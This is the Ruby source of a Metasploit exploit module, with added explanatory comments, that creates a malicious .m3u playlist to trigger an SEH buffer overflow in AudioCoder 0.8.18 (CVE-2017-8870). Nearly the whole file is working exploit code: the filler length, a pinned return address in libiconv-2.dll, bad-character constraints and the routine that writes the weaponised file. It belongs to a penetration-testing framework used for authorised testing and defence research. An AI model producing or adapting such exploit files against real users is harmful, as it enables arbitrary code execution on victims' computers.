Path: blob/master/modules/exploits/windows/fileformat/audio_coder_m3u.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# File-format module for the AudioCoder 0.8.18 .m3u buffer overflow
# (CVE-2017-8870 / OSVDB 92939 / EDB 25141, as listed under 'References').
#
# The module does not talk to a network service. It writes one playlist file
# (FILENAME, default msf.m3u) whose content is a single overlong "http://"
# entry. Per the description, the overflow happens when AudioCoder adds that
# playlist, and code runs with the privileges of the user running AudioCoder.
#
# Notes for triage and detection work:
# - The produced file is a single "http://" string followed by 765 filler
#   bytes, an SEH record and the encoded payload, so it is far longer than a
#   normal playlist URL.
# - The only target pins a return address inside libiconv-2.dll for build
#   0.8.18.5353; other builds may not match (not established by this file).
# - Reliability, stability and side effects are left at the framework's
#   UNKNOWN_* values, i.e. they are not assessed in this file.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  # Registers module metadata, the single supported target and the FILENAME
  # option.
  #
  # @param info [Hash] metadata passed in by the framework and merged with the
  #   values below through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AudioCoder .M3U Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in AudioCoder 0.8.18. The vulnerability
          occurs when adding an .m3u, allowing arbitrary code execution with the privileges
          of the user running AudioCoder. This module has been tested successfully on
          AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'metacom', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          ['CVE', '2017-8870'],
          ['OSVDB', '92939'],
          ['EDB', '25141']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process'
        },
        'Platform' => 'win',
        'Payload' => {
          'Space' => 6596,
          # Bytes the encoded payload must not contain:
          # NUL, backslash, '@', CR and LF.
          'BadChars' => "\x00\x5c\x40\x0d\x0a",
          'DisableNops' => true,
          'StackAdjustment' => -3500
        },
        'Targets' => [
          [
            'AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret' => 0x66011b56, # ppr from libiconv-2.dll
              # Number of filler bytes placed before the SEH record.
              'Offset' => 765
            }
          ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2013-05-01',
        'DefaultTarget' => 0,
        # Not assessed: all three values are the UNKNOWN_* placeholders.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [false, 'The file name.', 'msf.m3u'])
      ]
    )
  end

  # Builds the playlist content and writes it out through file_create.
  #
  # Layout, in order: the literal "http://" prefix, target['Offset'] bytes of
  # random filler, the SEH record generated for the target's return address,
  # and the encoded payload.
  def exploit
    playlist_entry = 'http://' +
                     rand_text(target['Offset']) +
                     generate_seh_record(target.ret) +
                     payload.encoded

    file_create(playlist_entry)
  end
end